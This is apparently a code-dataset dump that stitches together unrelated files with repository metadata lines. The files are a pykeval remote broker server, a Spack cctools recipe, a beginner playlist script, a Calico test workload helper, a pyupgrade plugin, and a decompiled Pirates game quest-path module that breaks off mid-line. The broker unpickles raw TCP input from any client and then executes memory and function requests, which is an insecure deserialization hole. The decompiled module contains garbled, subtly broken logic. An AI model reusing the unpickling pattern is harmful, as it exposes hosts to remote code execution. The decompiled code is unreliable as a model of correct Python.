import logging import pickle from socketserver import BaseRequestHandler, TCPServer from pykeval.broker.local import LocalBroker from pykeval.broker.requests import BrokerResponse, BrokerResponseType, BrokerRequest, BrokerRequestType from pykeval.broker.messaging import receive, send logger = logging.getLogger(__name__) class BrokerRequestHandler(BaseRequestHandler): broker_server = None def handle(self) -> None: logger.info(f"Got connection from {self.client_address}") data = receive(self.request) logger.debug("Received") try: request = pickle.loads(data) # noinspection PyProtectedMember response_data = self.__class__.broker_server._on_new_request(request) response = BrokerResponse(BrokerResponseType.SUCCESS, response_data) except Exception as e: logger.exception("Error processing request") response = BrokerResponse(BrokerResponseType.EXCEPTION, e) logger.debug("Serializing and sending response") serialized_response = pickle.dumps(response) send(self.request, serialized_response) logger.info(f"Sent response to {self.client_address}") class RemoteBrokerServer: """ A broker server based on a local broker over TCP. This works together with `RemoteBroker` to allow running code on a different machine than the client itself. """ def __init__(self, local_broker: LocalBroker, address: str, port: int): """ :param local_broker: The actual local broker that will handle requests :param address: The address of the server :param port: The port of the server """ self._local_broker = local_broker self._address = address self._port = port def start(self): """ Starts the TCP server. """ handler_type = type("BoundBrokerRequestHandler", (BrokerRequestHandler,), {"broker_server": self}) with TCPServer((self._address, self._port), handler_type) as server: logger.info(f"Starting server at {self._address}:{self._port}") server.serve_forever() def _on_new_request(self, request: BrokerRequest): """ Handles a broker request. :return: What the local broker returned for the request :raises ValueError if the request type is not supported. """ # No-data requests if request.type == BrokerRequestType.GET_POINTER_SIZE: return self._local_broker.get_pointer_size() # Data requests try: handler = { BrokerRequestType.CALL_FUNCTION: self._local_broker.call_function, BrokerRequestType.READ_BYTES: self._local_broker.read_bytes, BrokerRequestType.WRITE_BYTES: self._local_broker.write_bytes, BrokerRequestType.ALLOCATE: self._local_broker.allocate, BrokerRequestType.FREE: self._local_broker.free }[request.type] return handler(request.data) except KeyError: pass raise ValueError(f"Unrecognized request type {request.type.value}")
35.820225
120
0.67064
b523160db88a32431886e9c2c04ede8ccb5f3f73
4,697
py
Python
var/spack/repos/builtin/packages/cctools/package.py
hseara/spack
4c9c5393f1fad00b7e8c77661a02b236db2d0e40
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
null
null
null
var/spack/repos/builtin/packages/cctools/package.py
hseara/spack
4c9c5393f1fad00b7e8c77661a02b236db2d0e40
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
11
2021-05-12T06:06:20.000Z
2022-03-30T23:10:14.000Z
var/spack/repos/builtin/packages/cctools/package.py
btovar/spack
f901c61e684a251c4396221517ff492a741dd946
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
null
null
null
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Cctools(AutotoolsPackage): """The Cooperative Computing Tools (cctools) enable large scale distributed computations to harness hundreds to thousands of machines from clusters, clouds, and grids. """ homepage = "https://cctools.readthedocs.io" url = "https://ccl.cse.nd.edu/software/files/cctools-7.2.3-source.tar.gz" version('7.2.3', sha256='c9d32f9e9d4886ef88b79cc7c898c26e8369a004132080697b8523560cb8765b') version('7.2.2', sha256='3eee05826954792e3ef974fefe3b8e436f09cd368b195287639b67f5acfa050f') version('7.2.1', sha256='8f847fef9bca1ebd23a93d74fc093807d2c3e584111c087cf25e070e130eb820') version('7.1.7', sha256='63cbfabe52591d41a1b27040bf27700d2a11b2f30cb2e25132e0016fb1aade03') version('7.1.5', sha256='c01415fd47a1d9626b6c556e0dc0a6b0d3cd67224fa060cabd44ff78eede1d8a') version('7.1.3', sha256='b937878ab429dda31bc692e5d9ffb402b9eb44bb674c07a934bb769cee4165ba') version('7.1.2', sha256='ca871e9fe245d047d4c701271cf2b868e6e3a170e8834c1887157ed855985131') version('7.1.0', sha256='84748245db10ff26c0c0a7b9fd3ec20fbbb849dd4aadc5e8531fd1671abe7a81') version('7.0.18', sha256='5b6f3c87ae68dd247534a5c073eb68cb1a60176a7f04d82699fbc05e649a91c2') version('6.1.1', sha256='97f073350c970d6157f80891b3bf6d4f3eedb5f031fea386dc33e22f22b8af9d') depends_on('openssl') depends_on('perl+shared', type=('build', 'run')) depends_on('python', type=('build', 'run')) depends_on('readline') depends_on('gettext') # Corrects python linking of -lintl flag. depends_on('swig') # depends_on('xrootd') depends_on('zlib') patch('arm.patch', when='target=aarch64:') patch('cctools_7.0.18.python.patch', when='@7.0.18') patch('cctools_6.1.1.python.patch', when='@6.1.1') # Generally SYS_foo is defined to __NR_foo (sys/syscall.h) which # is then defined to a syscall number (asm/unistd_64.h). Certain # CentOS systems have SYS_memfd_create defined to # __NR_memfd_create but are missing the second definition. # This is a belt and suspenders solution to the problem. def patch(self): before = '#if defined(__linux__) && defined(SYS_memfd_create)' after = '#if defined(__linux__) && defined(SYS_memfd_create) && defined(__NR_memfd_create)' # noqa: E501 f = 'dttools/src/memfdexe.c' kwargs = {'ignore_absent': False, 'backup': True, 'string': True} filter_file(before, after, f, **kwargs) if self.spec.satisfies('%fj'): makefiles = ['chirp/src/Makefile', 'grow/src/Makefile'] for m in makefiles: filter_file('-fstack-protector-all', '', m) def configure_args(self): args = [] # make sure we do not pick a python outside spack: if self.spec.satisfies('@6.1.1'): if self.spec.satisfies('^python@3:'): args.extend([ '--with-python3-path', self.spec['python'].prefix, '--with-python-path', 'no' ]) elif self.spec.satisfies('^python@:2.9'): args.extend([ '--with-python-path', self.spec['python'].prefix, '--with-python3-path', 'no' ]) else: args.extend([ '--with-python-path', 'no', '--with-python3-path', 'no' ]) else: # versions 7 and above, where --with-python-path recognized the # python version: if self.spec.satisfies('^python@3:'): args.extend([ '--with-python-path', self.spec['python'].prefix, '--with-python2-path', 'no' ]) elif self.spec.satisfies('^python@:2.9'): args.extend([ '--with-python-path', self.spec['python'].prefix, '--with-python3-path', 'no' ]) else: args.extend([ '--with-python2-path', 'no', '--with-python3-path', 'no' ]) # disable these bits for p in ['mysql', 'xrootd']: args.append('--with-{0}-path=no'.format(p)) # point these bits at the Spack installations for p in ['openssl', 'perl', 'readline', 'swig', 'zlib']: args.append('--with-{0}-path={1}'.format(p, self.spec[p].prefix)) return args
44.733333
113
0.609751
e5f974693e019a0bc8df44b85de3a978ca622281
745
py
Python
Week 5 - playList/Week 5 Task.py
Jasleenk47/BeginnerRoom-2020
32903f6917a236fe685106c148b8531c62210f1f
[ "Unlicense" ]
5
2021-01-19T00:31:22.000Z
2021-03-05T02:31:10.000Z
Week 5 - playList/Week 5 Task.py
Jasleenk47/BeginnerRoom-2020
32903f6917a236fe685106c148b8531c62210f1f
[ "Unlicense" ]
34
2021-01-14T21:00:18.000Z
2021-03-11T17:57:26.000Z
Week 5 - playList/Week 5 Task.py
Jasleenk47/BeginnerRoom-2020
32903f6917a236fe685106c148b8531c62210f1f
[ "Unlicense" ]
43
2021-01-14T20:40:47.000Z
2021-03-11T02:29:30.000Z
sad_playlist = ["SO DONE"] print(sad_playlist) sad_playlist.append("Reminds Me of You") print(sad_playlist) sad_playlist.sort(reverse=True) print(sad_playlist) sad_playlist.append("WITHOUT YOU") print(sad_playlist) sad_playlist.sort(reverse=False) print(sad_playlist) print("") print("THIS IS JUST EXTRA (I WAS JUST BORED AND SURPRISED THAT THE TASK FOR THIS WEEK WAS THIS EASY). HEHE") print("P.S. Kid Laroi was either the solo artist or featured on these tracks.") print("") print("Full Depressing Playlist: ") print ("1. SO DONE") print ("2. TRAGIC") print("3. ALWAYS DO") print("4. FEEL SOMETHING") print("5. WITHOUT YOU") print("6. GO") print("7. Reminds Me of You") print("8. WRONG") print("") print("These are only some.")
18.170732
108
0.718121
ec6f3f05c10daed0201cea0a439f5926c4d9509b
5,350
py
Python
calico_test/tests/st/utils/workload.py
tomdee/calico-containers
09abe8353456acc2cec8fe55b7cfe07a4d8cad2f
[ "Apache-2.0" ]
null
null
null
calico_test/tests/st/utils/workload.py
tomdee/calico-containers
09abe8353456acc2cec8fe55b7cfe07a4d8cad2f
[ "Apache-2.0" ]
3
2015-07-30T19:18:58.000Z
2015-07-30T23:32:19.000Z
calico_test/tests/st/utils/workload.py
tomdee/calico-docker
09abe8353456acc2cec8fe55b7cfe07a4d8cad2f
[ "Apache-2.0" ]
null
null
null
# Copyright 2015 Metaswitch Networks # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from functools import partial import logging from netaddr import IPAddress from utils import retry_until_success, debug_failures from network import DockerNetwork from exceptions import CommandExecError NET_NONE = "none" logger = logging.getLogger(__name__) class Workload(object): """ A calico workload. These are the end-users containers that will run application-level software. """ def __init__(self, host, name, image="busybox", network="bridge"): """ Create the workload and detect its IPs. :param host: The host container on which this workload is instantiated. All commands executed by this container will be passed through the host via docker exec. :param name: The name given to the workload container. This name is passed to docker and can be used inside docker commands. :param image: The docker image to be used to instantiate this container. busybox used by default because it is extremely small and has ping. :param network: The DockerNetwork to connect to. Set to None to use default Docker networking. """ self.host = host self.name = name command = "docker run -tid --name %s --net %s %s" % (name, network, image) host.execute(command) self.ip = host.execute("docker inspect --format " "'{{.NetworkSettings.Networks.%s.IPAddress}}' %s" % (network, name)) def execute(self, command): """ Execute arbitrary commands on this workload. """ # Make sure we've been created in the context of a host. Done here # instead of in __init__ as we can't exist in the host until we're # created. assert self in self.host.workloads return self.host.execute("docker exec %s %s" % (self.name, command)) def _get_ping_function(self, ip): """ Return a function to ping the supplied IP address from this workload. :param ip: The IPAddress to ping. :return: A partial function that can be executed to perform the ping. The function raises a CommandExecError exception if the ping fails, or returns the output of the ping. """ # Default to "ping" ping = "ping" try: version = IPAddress(ip).version assert version in [4, 6] if version == 6: ping = "ping6" except BaseException: pass args = [ ping, "-c", "1", # Number of pings "-W", "1", # Timeout for each ping ip, ] command = ' '.join(args) ping = partial(self.execute, command) return ping @debug_failures def assert_can_ping(self, ip, retries=0): """ Execute a ping from this workload to the ip. Assert than a workload can ping an IP. Use retries to allow for convergence. Use of this method assumes the network will be transitioning from a state where the destination is currently unreachable. :param ip: The IP address (str or IPAddress) to ping. :param retries: The number of retries. :return: None. """ try: retry_until_success(self._get_ping_function(ip), retries=retries, ex_class=CommandExecError) except CommandExecError: raise AssertionError("%s cannot ping %s" % (self, ip)) @debug_failures def assert_cant_ping(self, ip, retries=0): """ Execute a ping from this workload to the ip. Assert that the workload cannot ping an IP. Use retries to allow for convergence. Use of this method assumes the network will be transitioning from a state where the destination is currently reachable. :param ip: The IP address (str or IPAddress) to ping. :param retries: The number of retries. :return: None. """ ping = self._get_ping_function(ip) def cant_ping(): try: ping() except CommandExecError: pass else: raise _PingError() try: retry_until_success(cant_ping, retries=retries, ex_class=_PingError) except _PingError: raise AssertionError("%s can ping %s" % (self, ip)) def __str__(self): return self.name class _PingError(Exception): pass
34.294872
79
0.595327
a604dbfc0c74a10c08797b6ddc3d87cd48baae7f
1,378
py
Python
pyupgrade/_plugins/c_element_tree.py
adamchainz/pyupgrade
ccf3a9192fca6d2883b1e67d785e0010243e30c3
[ "MIT" ]
1,615
2017-03-17T02:45:59.000Z
2022-03-31T18:53:20.000Z
pyupgrade/_plugins/c_element_tree.py
jiayanali/pyupgrade
b6e103248fd97b04d2bea898b95d1d8776fece57
[ "MIT" ]
357
2017-03-13T00:32:34.000Z
2022-03-25T14:51:19.000Z
pyupgrade/_plugins/c_element_tree.py
jiayanali/pyupgrade
b6e103248fd97b04d2bea898b95d1d8776fece57
[ "MIT" ]
130
2017-06-23T04:28:50.000Z
2022-03-31T11:33:19.000Z
import ast from typing import Iterable from typing import List from typing import Tuple from tokenize_rt import Offset from tokenize_rt import Token from pyupgrade._ast_helpers import ast_to_offset from pyupgrade._data import register from pyupgrade._data import State from pyupgrade._data import TokenFunc from pyupgrade._token_helpers import find_token def _replace_celementtree_with_elementtree( i: int, tokens: List[Token], ) -> None: j = find_token(tokens, i, 'cElementTree') tokens[j] = tokens[j]._replace(src='ElementTree') @register(ast.ImportFrom) def visit_ImportFrom( state: State, node: ast.ImportFrom, parent: ast.AST, ) -> Iterable[Tuple[Offset, TokenFunc]]: if ( state.settings.min_version >= (3,) and node.module == 'xml.etree.cElementTree' and node.level == 0 ): yield ast_to_offset(node), _replace_celementtree_with_elementtree @register(ast.Import) def visit_Import( state: State, node: ast.Import, parent: ast.AST, ) -> Iterable[Tuple[Offset, TokenFunc]]: if ( state.settings.min_version >= (3,) and len(node.names) == 1 and node.names[0].name == 'xml.etree.cElementTree' and node.names[0].asname is not None ): yield ast_to_offset(node), _replace_celementtree_with_elementtree
27.019608
73
0.682874
320a9f30027fd584051191ff0d788fe7fcb7b5ee
24,751
py
Python
pirates/quest/QuestPath.py
itsyaboyrocket/pirates
6ca1e7d571c670b0d976f65e608235707b5737e3
[ "BSD-3-Clause" ]
3
2021-02-25T06:38:13.000Z
2022-03-22T07:00:15.000Z
pirates/quest/QuestPath.py
itsyaboyrocket/pirates
6ca1e7d571c670b0d976f65e608235707b5737e3
[ "BSD-3-Clause" ]
null
null
null
pirates/quest/QuestPath.py
itsyaboyrocket/pirates
6ca1e7d571c670b0d976f65e608235707b5737e3
[ "BSD-3-Clause" ]
1
2021-02-25T06:38:17.000Z
2021-02-25T06:38:17.000Z
# uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: pirates.quest.QuestPath from pandac.PandaModules import TransformState from direct.directnotify import DirectNotifyGlobal from direct.showbase.PythonUtil import report from pirates.pirate import AvatarType, AvatarTypes from pirates.piratesbase import PiratesGlobals from pirates.quest import QuestConstants from pirates.piratesbase import TeamUtils from pirates.world import LocationConstants import types, copy class QuestGoal: __module__ = __name__ Type_Uid = 0 Type_Custom = 1 LEVEL_IDX = 0 TYPE_IDX = 1 FACTION_IDX = 2 HULL_IDX = 3 FLAGSHIP_IDX = 4 LOCATION_IDX = 5 MAX_IDX = 6 GOAL_TYPE_DINGHY = 'dinghy' GOAL_TYPE_SHIP = 'ship' GOAL_TYPES_OCEAN = [GOAL_TYPE_SHIP] def __init__(self, typeInfo): self.__goalDataStr = None if typeInfo == None: self.__goalType = types.ListType self.__goalData = [] return if type(typeInfo) == types.StringType: typeInfo = [typeInfo] self.__goalData = typeInfo self.__goalType = type(self.__goalData) return def getType(self): if self.__goalType == types.DictType: return self.Type_Custom return self.Type_Uid def getTargetType(self): if self.__goalType == types.DictType: return self.__goalData.get(self.TYPE_IDX) return (0, 0, 0, 0) def getTargetTypeOnlyOnOcean(self): return self.getTargetType() in self.GOAL_TYPES_OCEAN def getLocation(self): if self.__goalType == types.DictType: return self.__goalData.get(self.LOCATION_IDX) return def compareTo(self, object, goalOwner=None): if self.__goalType == types.DictType: goalLevel = self.__goalData.get(self.LEVEL_IDX, 0) if goalLevel > 0: if goalLevel > object.getLevel(): return 1 hasIsShip = hasattr(object, '_isShip') if game.process == 'ai': if not hasIsShip: return -1 goalLocation = self.__goalData.get(self.LOCATION_IDX, None) objectLocation = object.getParentObj() if goalLocation and objectLocation and hasattr(objectLocation, 'getUniqueId') and not goalLocation == LocationConstants.LocationIds.ANY_LOCATION and not LocationConstants.isInArea(goalLocation, objectLocation.getUniqueId())[0]: return 1 goalFaction = hasIsShip and object._isShip() and self.getTargetTypeOnlyOnOcean() and self.__goalData.get(self.FACTION_IDX, None) if goalFaction: isEnemy = False if goalOwner: isEnemy = TeamUtils.friendOrFoe(goalOwner, object) == PiratesGlobals.ENEMY objFaction = object.getFaction() if goalFaction != None and objFaction != None and goalFaction.getFaction() != objFaction.getFaction() or not isEnemy: return 1 goalHull = self.__goalData.get(self.HULL_IDX, None) if goalHull != None: shipClassList = QuestConstants.getShipList(goalHull) if shipClassList == None: shipClassList = [ goalHull] if object.shipClass not in shipClassList: return 1 goalFlagship = self.__goalData.get(self.FLAGSHIP_IDX, False) if goalFlagship != object.isFlagship: return 1 if object.getTeam() == PiratesGlobals.PLAYER_TEAM: return 1 return 0 elif self.getTargetTypeOnlyOnOcean() or self.__goalData.get(self.TYPE_IDX) == AvatarTypes.AnyAvatar: if goalOwner: if TeamUtils.friendOrFoe(goalOwner, object) == PiratesGlobals.ENEMY: return 0 elif object.getAvatarType().isA(self.__goalData.get(self.TYPE_IDX)): return 0 else: if self.__goalData and object.getUniqueId() in self.__goalData: return 0 return 1 def getGoalIds(self, uidMgr=None, all=True): if all: results = [ (0, '')] else: results = '' if self.__goalType == types.ListType: if all: uidData = self.__goalData else: uidData = self.__goalData[:1] if uidMgr: results = zip(map(lambda x: uidMgr.getDoId(x, None), uidData), uidData) elif len(uidData) == 0: results = '' else: results = uidData[0] return results def _asString(self): if self.__goalDataStr != None: return self.__goalDataStr if self.__goalData == None: resultStr = '' if self.__goalType == types.ListType: resultStr = str(self.__goalData) else: strRep = '' for currField in range(self.MAX_IDX): strRep += str(self.__goalData.get(currField, None)) strRep += '-' resultStr = strRep self.__goalDataStr = resultStr return resultStr def __repr__(self): return self._asString() def __str__(self): return self._asString() def __cmp__(self, other): strRep = self._asString() otherStrRep = other._asString() if strRep < otherStrRep: return -1 else: if strRep > otherStrRep: return 1 return 0 def __hash__(self): result = hash(self._asString()) return result class QuestStep: __module__ = __name__ STNPC = 1 STItem = 2 STArea = 3 STTunnel = 4 STExteriorDoor = 5 STInteriorDoor = 6 STDinghy = 7 STShip = 8 STNPCArea = 9 STQuestNode = 10 STNPCEnemy = 11 STQuestProp = 12 NullStep = None notify = DirectNotifyGlobal.directNotify.newCategory('QuestStep') def __init__(self, originDoId, stepDoId, stepType, posH=(0, 0, 0, 0), islandUid='', targetAreaUid='', targetAvatarType=None, nodeSizes=(0, 0), nearOffset=(0, 0, 0), nearVis=(0, 0, 0)): self.originDoId = originDoId self.stepDoId = stepDoId self.stepType = stepType self.posH = posH self.islandUid = islandUid self.targetAreaUid = targetAreaUid self.targetAvatarType = targetAvatarType self.nodeSizes = nodeSizes self.nearOffset = nearOffset self.nearVis = nearVis def __repr__(self): return 'QuestStep(%d, %d, %d, %s, %s, %s, %s, %s, %s, %s)' % (self.getOriginDoId(), self.getStepDoId(), self.getStepType(), `(self.getPosH())`, self.getIsland(), self.getTargetArea(), self.targetAvatarType, self.nodeSizes, self.nearOffset, self.nearVis) def __cmp__(self, other): return not isinstance(other, QuestStep) or cmp(self.originDoId, other.originDoId) or cmp(self.stepDoId, other.stepDoId) or cmp(self.stepType, other.stepType) or cmp(self.posH, other.posH) or cmp(self.islandUid, other.islandUid) or cmp(self.targetAreaUid, other.targetAreaUid) or cmp(self.targetAvatarType, other.targetAvatarType) or cmp(self.nodeSizes, other.nodeSizes) or cmp(self.nearOffset, other.nearOffset) or cmp(self.nearVis, other.nearVis) def compareTarget(self, other): try: return not isinstance(other, QuestStep) or cmp(self.originDoId, other.originDoId) or cmp(self.stepDoId, other.stepDoId) or cmp(self.stepType, other.stepType) or cmp(self.islandId, other.islandId) or cmp(self.targetAreaId, other.targetAreaId) or cmp(self.targetAvatarType, other.targetAvatarType) or cmp(self.nodeSizes, other.nodeSizes) or cmp(self.nearOffset, other.nearOffset) or cmp(self.nearVis, other.nearVis) except: self.notify.warning('error encountered when comparing queststeps %s and %s' % (self, other)) return 0 def getOriginDoId(self): return self.originDoId def getStepDoId(self): return self.stepDoId def getStepType(self): return self.stepType def getPosH(self): return self.posH def setIsland(self, islandUid=''): self.islandUid = islandUid def getIsland(self): return self.islandUid def setTargetArea(self, targetUid=''): self.targetAreaUid = targetUid def getTargetArea(self): return self.targetAreaUid def getNodeSizes(self): return self.nodeSizes def getNearOffset(self): return self.nearOffset def getNearVis(self): return self.nearVis @staticmethod def getNullStep(): if QuestStep.NullStep: pass else: QuestStep.NullStep = QuestStep(0, 0, 0) return QuestStep.NullStep def showIndicator(self): targetLocation = self.getTargetArea() parentObj = localAvatar.getParentObj() if config.GetBool('dynamic-rayoflight-area-only', True) and parentObj and hasattr(parentObj, 'uniqueId') and parentObj.uniqueId == targetLocation: return False return True class QuestPath: __module__ = __name__ notify = DirectNotifyGlobal.directNotify.newCategory('QuestPath') def __init__(self, air): self.world = None self.posH = (0, 0, 0, 0) self.questSteps = {} self.islandStep = None self.islandDoId = None self.preferredStepUids = set() if __dev__: pass return def delete(self): self.islandDoId = None self.islandStep = None self.questSteps = {} self.world = None return def setWorld(self, world): self.world = world def setQuestStepPosH(self, x, y, z, h): self.posH = ( x, y, z, h) def getIslandDoId(self): if self.islandDoId: pass else: if self._isIsland(): self.islandDoId = self.doId return self.islandDoId @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def getQuestStepIsland(self): if self._isIsland(): return QuestStep(0, self.getIslandDoId(), self._getQuestStepType()) @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def getQuestStep(self, questDestUid, islandDoId, avId): if not self.getIslandDoId(): self.getExitIslandStep() questIslandDoId = islandDoId questIsland = None isPrivate = False goalType = questDestUid.getType() if goalType != QuestGoal.Type_Custom: if islandDoId == None: questIslandDoId = self.world.getObjectIslandDoId(questDestUid) isPrivate = self.world.getObjectIsPrivate(questDestUid) if not questIslandDoId: return questIsland = self.air.doId2do.get(questIslandDoId) if not questIsland: return islandObj = (questIslandDoId or goalType == QuestGoal.Type_Custom) and (self.getIslandDoId() == questIslandDoId or goalType == QuestGoal.Type_Custom) and not questDestUid.getTargetTypeOnlyOnOcean() and self.getIsland() if islandObj: if goalType == QuestGoal.Type_Custom: if islandObj.notHasQuestGoal(questDestUid): return QuestStep.NullStep islandSearchResult = self.getIntoIslandStep(questDestUid, isPrivate, avId) if islandObj: if islandSearchResult == None or islandSearchResult == QuestStep.NullStep: islandObj.setNotHasQuestGoal(questDestUid) else: searchArea = self._checkNeedDinghyStep(avId, islandSearchResult.getOriginDoId()) if searchArea: return self._getLocalDinghy(avId, questDestUid, searchArea=searchArea) return islandSearchResult else: step = self.getExitIslandStep() if step: return step else: dinghyStep = self._getLocalDinghy(avId, questDestUid) if dinghyStep: return dinghyStep else: destIsland = self.air.doId2do.get(questIslandDoId) if destIsland: return QuestStep(self.doId, questIslandDoId, questIsland._getQuestStepType()) return def _checkNeedDinghyStep(self, avId, goalOriginId): avObj = self.air.doId2do.get(avId) if avObj: avParent = avObj.getParentObj() avIsland = avParent.getIsland() if avParent is avIsland: if goalOriginId != avParent.doId: return avParent return def _getLocalDinghy(self, avId, questDestUid, searchArea=None): avObj = self.air.doId2do.get(avId) if avObj: avZone = avObj.zoneId if searchArea == None: searchArea = self dinghyId = self.world.queryGoalByObjectType(QuestGoal.GOAL_TYPE_DINGHY, avObj, questDestUid, searchArea) dinghyObj = self.air.doId2do.get(dinghyId) if dinghyObj: dinghyPos = dinghyObj.getPos(searchArea) return QuestStep(searchArea.doId, dinghyId, dinghyObj._getQuestStepType(), posH=(dinghyPos[0], dinghyPos[1], dinghyPos[2], dinghyObj.getH()), islandUid=self.getUniqueId()) return @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def getExitIslandStep(self): if self._isIsland() or self._isShip(): return if not self.islandStep: self._getIslandPath([], [], {}) returnStep = copy.copy(self.islandStep) return returnStep @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def getIntoIslandStep(self, questDestUid, isPrivate, avId=None): questStep = self.questSteps.get(questDestUid) if not questStep or config.GetBool('cache-quest-step', 1) == 0: path = self._getQuestPath(questDestUid, isPrivate, [], [], {}, avId) if path: targetAreaUid = self.air.doId2do[path[len(path) - 1]].getParentObj().uniqueId questStep = self.questSteps.get(questDestUid) if questStep: questStep.setTargetArea(targetAreaUid) if questDestUid.getType() == QuestGoal.Type_Custom: self.questSteps.pop(questDestUid, None) return questStep def getOntoOceanStep(self, questDestUid, avId): questIds = self.world.queryGoal(questDestUid, self, avId) for questDoId, questUid in questIds: questGoalObj = self.air.doId2do.get(questDoId) if questGoalObj: questDest = QuestStep(self.world.worldGrid.doId, questDoId, questGoalObj._getQuestStepType(), questGoalObj._getQuestStepPosH()) avObj = self.air.doId2do.get(avId) if avObj: avObj.setQuestGoalDoId(questGoalObj) return questDest return QuestStep.NullStep def _getExitLinkDoIds(self, questGoalUid): if __dev__: pass return [] def _getQuestStepType(self): if __dev__: pass return 0 def _isIsland(self): if __dev__: pass return False def _isShip(self): return False def _getQuestStepPosH(self): return self.posH @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def _getIslandPath(self, alreadyVisited, needToVisit, pathDict): islandPath = [] needToStore = False if not islandPath: if self._isIsland(): islandPath = alreadyVisited + [self.doId] if islandPath: finalPath = [ islandPath[-1]] next = pathDict.get(finalPath[-1]) while next: finalPath.append(next) next = pathDict.get(finalPath[-1]) finalPath.reverse() else: exitLinks = [ linkDoId for linkDoId in self._getExitLinkDoIds(None) if linkDoId not in alreadyVisited if linkDoId not in needToVisit ] for link in exitLinks: pathDict[link] = self.doId needToVisit += exitLinks if needToVisit: nextDoId = needToVisit.pop(0) nextStep = self.air.doId2do[nextDoId] finalPath = nextStep._getIslandPath(alreadyVisited + [self.doId], needToVisit, pathDict) needToStore = True else: finalPath = [] if needToStore and self.doId in finalPath: self._storeIslandStep(finalPath) return finalPath @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def _storeIslandStep(self, path): stepDoId = path[path.index(self.doId) + 1] step = self.air.doId2do[stepDoId] if __dev__: pass self.islandStep = QuestStep(self.doId, stepDoId, step._getQuestStepType(), step._getQuestStepPosH()) self.islandDoId = step.islandDoId @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def _getQuestPath(self, questDestUid, isPrivate, alreadyVisited, needToVisit, pathDict, avId): questDest = None questPath = [] needToStore = False if not isPrivate: if not questPath: questIds = self.world.queryGoal(questDestUid, self, avId) for questDoId, questUid in questIds: questGoalObj = self.air.doId2do.get(questDoId) if questGoalObj: if questGoalObj.getParentObj() is self or questGoalObj is self: if questDoId != self.doId: pathDict.setdefault(questDoId, self.doId) newIds = [self.doId, questDoId] else: newIds = [ self.doId] questPath = alreadyVisited + [self.doId, questDoId] questDest = QuestStep(self.doId, questDoId, questGoalObj._getQuestStepType(), questGoalObj._getQuestStepPosH()) needToStore = True avObj = self.air.doId2do.get(avId) if avObj: avObj.setQuestGoalDoId(questGoalObj) break else: if questDoId != None: pass if questDestUid.getType() != QuestGoal.Type_Custom and questUid: try: objInfo = self.air.worldCreator.getObjectDataFromFileByUid(questUid, self.getFileName()) if objInfo: if objInfo.get('Type') == 'Dinghy': pos = objInfo['Pos'] hpr = objInfo['Hpr'] questPath = alreadyVisited + [self.doId] questDest = QuestStep(self.doId, 0, QuestStep.STQuestNode, ( pos[0], pos[1], pos[2], hpr[0])) needToStore = True break elif objInfo.get('Type') == 'Quest Node': pos = objInfo['Pos'] nodePos = None parentUid = self.air.worldCreator.getObjectDataFromFileByUid(questUid, self.getFileName(), getParentUid=True) if parentUid: parentObj = self.world.uidMgr.justGetMeMeObject(parentUid) if parentObj: tform = TransformState.makePosHpr(parentObj.getPos(self), parentObj.getHpr(self)) nodePos = tform.getMat().xformPoint(pos) if nodePos == None: nodePos = pos hpr = objInfo['Hpr'] at = int(float(objInfo['At'])) near = int(float(objInfo['Near'])) nearOffset = (int(objInfo['NearOffsetX']), int(objInfo['NearOffsetY']), int(objInfo['NearOffsetZ'])) nearVis = ( int(objInfo['NearVisX']), int(objInfo['NearVisY']), int(objInfo['NearVisZ'])) questPath = alreadyVisited + [self.doId] questDest = QuestStep(self.doId, 0, QuestStep.STQuestNode, ( nodePos[0], nodePos[1], nodePos[2], hpr[0]), nodeSizes=[at, near], nearOffset=nearOffset, nearVis=nearVis) needToStore = True break elif objInfo.get('Type') == 'Object Spawn Node': pos = objInfo['Pos'] hpr = objInfo['Hpr'] questPath = alreadyVisited + [self.doId] questDest = QuestStep(self.doId, 0, QuestStep.STArea, ( pos[0], pos[1], pos[2], hpr[0])) needToStore = True break except AttributeError: pass else: if not questPath: if self.air.worldCreator.isObjectDefined(questDestUid.getGoalIds(all=False), self.world.getFileName() + '.py'): questPath = alreadyVisited + [self.doId] needToStore = False if questPath: finalPath = [ questPath[-1]] next = pathDict.get(finalPath[-1]) while next: finalPath.append(next) next = pathDict.get(finalPath[-1]) finalPath.reverse() else: exitLinks = [ linkDoId for linkDoId in self._getExitLinkDoIds(questDestUid.getGoalIds(all=False)) if linkDoId not in alreadyVisited if linkDoId not in needToVisit ] for link in exitLinks: pathDict[link] = self.doId needToVisit += exitLinks if needToVisit: nextDoId = needToVisit.pop(0) nextStep = self.air.doId2do[nextDoId] finalPath = nextStep._getQuestPath(questDestUid, isPrivate, alreadyVisited + [self.doId], needToVisit, pathDict, avId) if questDestUid.getType() == QuestGoal.Type_Custom: nextStep.questSteps.pop(questDestUid, None) needToStore = True else: finalPath = [] needToStore = True if needToStore and self.doId in finalPath: self._storeQuestStep(finalPath, questDestUid, questDest) if not finalPath: self._storeQuestStep(finalPath, questDestUid, questStep=QuestStep.getNullStep()) return finalPath @report(types=['frameCount', 'args'], dConfigParam='quest-indicator') def _storeQuestStep(self, path, questDestUid, questStep=None): if not questStep: stepDoId = path[path.index(self.doId) + 1] step = self.air.doId2do[stepDoId] if __dev__: pass questStep = QuestStep(self.doId, stepDoId, step._getQuestStepType(), step._getQuestStepPosH()) self.questSteps[questDestUid] = questStep def setAsPreferredStepFor(self, questGoalUid): self.preferredStepUids.add(questGoalUid) def isPreferredStep(self, questGoalUid): return questGoalUid in 